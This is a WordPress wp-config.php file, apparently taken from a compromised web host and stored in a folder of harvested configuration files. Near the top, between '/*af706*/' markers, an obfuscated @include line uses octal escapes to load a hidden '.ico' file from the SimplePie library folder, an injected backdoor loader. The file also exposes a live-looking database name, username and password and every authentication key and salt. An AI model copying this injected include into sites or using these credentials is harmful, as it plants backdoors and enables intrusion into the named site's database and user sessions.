File: /home/happyrestoration/public_html/configNIJ/79-WordPress-public_html.txt
<?php
//Begin Really Simple SSL session cookie settings
@ini_set('session.cookie_httponly', true);
@ini_set('session.cookie_secure', true);
@ini_set('session.use_only_cookies', true);
//END Really Simple SSL cookie settings
/*af706*/
@include "\057home\057ratb\165ster\163flor\151da/p\165blic\137html\057wp-i\156clud\145s/Si\155pleP\151e/Pa\162se/.\066dfa8\144a8.i\143o";
/*af706*/
/**
* The base configuration for WordPress
*
* The wp-config.php creation script uses this file during the
* installation. You don't have to use the web site, you can
* copy this file to "wp-config.php" and fill in the values.
*
* This file contains the following configurations:
*
* * MySQL settings
* * Secret keys
* * Database table prefix
* * ABSPATH
*
* @link https://wordpress.org/support/article/editing-wp-config-php/
*
* @package WordPress
*/
// ** MySQL settings - You can get this info from your web host ** //
/** The name of the database for WordPress */
define( 'DB_NAME', 'ratbustersflorida_wordpress' );
/** MySQL database username */
define( 'DB_USER', 'ratbustersflorida' );
/** MySQL database password */
define( 'DB_PASSWORD', 'Info@ahc2019!' );
/** MySQL hostname */
define( 'DB_HOST', 'localhost' );
/** Database Charset to use in creating database tables. */
define( 'DB_CHARSET', 'utf8mb4' );
/** The Database Collate type. Don't change this if in doubt. */
define( 'DB_COLLATE', '' );
/**#@+
* Authentication Unique Keys and Salts.
*
* Change these to different unique phrases!
* You can generate these using the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}
* You can change these at any point in time to invalidate all existing cookies. This will force all users to have to log in again.
*
* @since 2.6.0
*/
define( 'AUTH_KEY', '4ShPSJ|]3D[wGrmf[dZiy|S:>`~v/|3T6E,r-VkGAt}L}n.~F`dQ@?Ko6!Mr]ju+' );
define( 'SECURE_AUTH_KEY', 'C{(dj5NSC[kYN4NC@wnuJ_Lr{MM0[uUL3Z!v#[lK$Et`NhkbrAxX>EROxEyJv<:s' );
define( 'LOGGED_IN_KEY', '@xXQ[K;B_O@DW<UQ[j9c^F|O{7$0D[d;G6#K*oUn%-baB[@t./(Y/pAqm`ur) 1m' );
define( 'NONCE_KEY', 'B6&Jf>$)&~u_-:f[fbSLV@:ndyT#6RDM=a&Fhc4#O2I<uY!md:(ZH&6xTTvcx{{N' );
define( 'AUTH_SALT', 'Q}@+?:5h(N& 1mN?hQ35qBKZuI&7qk9!0Q&I+P!:~q&d..a7SK=DY85y. A&mi?4' );
define( 'SECURE_AUTH_SALT', '!/.OcEaZkc5VV^w*ry2,SQqk]GmcTIw_A~CJRPcJB>F,d(QJ($9M#4.{A{4f{6(&' );
define( 'LOGGED_IN_SALT', 'rAR<TBk=8- bg<1c@0#>c[i?tAA`y^8r[N%}Q];II?xnE@(!/uTLzb]|-4:aX8R/' );
define( 'NONCE_SALT', 'uuh!1$NaY@y5wb6Dnp3|5k(0rmIZMuLZ.#0zft%g@elmOkm%8PRIOt_>z==Bxtpm' );
/**#@-*/
/**
* WordPress Database Table prefix.
*
* You can have multiple installations in one database if you give each
* a unique prefix. Only numbers, letters, and underscores please!
*/
$table_prefix = 'wp_';
/**
* For developers: WordPress debugging mode.
*
* Change this to true to enable the display of notices during development.
* It is strongly recommended that plugin and theme developers use WP_DEBUG
* in their development environments.
*
* For information on other constants that can be used for debugging,
* visit the documentation.
*
* @link https://wordpress.org/support/article/debugging-in-wordpress/
*/
define( 'WP_DEBUG', false );
/* That's all, stop editing! Happy publishing. */
/** Absolute path to the WordPress directory. */
if ( ! defined( 'ABSPATH' ) ) {
define( 'ABSPATH', __DIR__ . '/' );
}
/** Sets up WordPress vars and included files. */
require_once ABSPATH . 'wp-settings.php';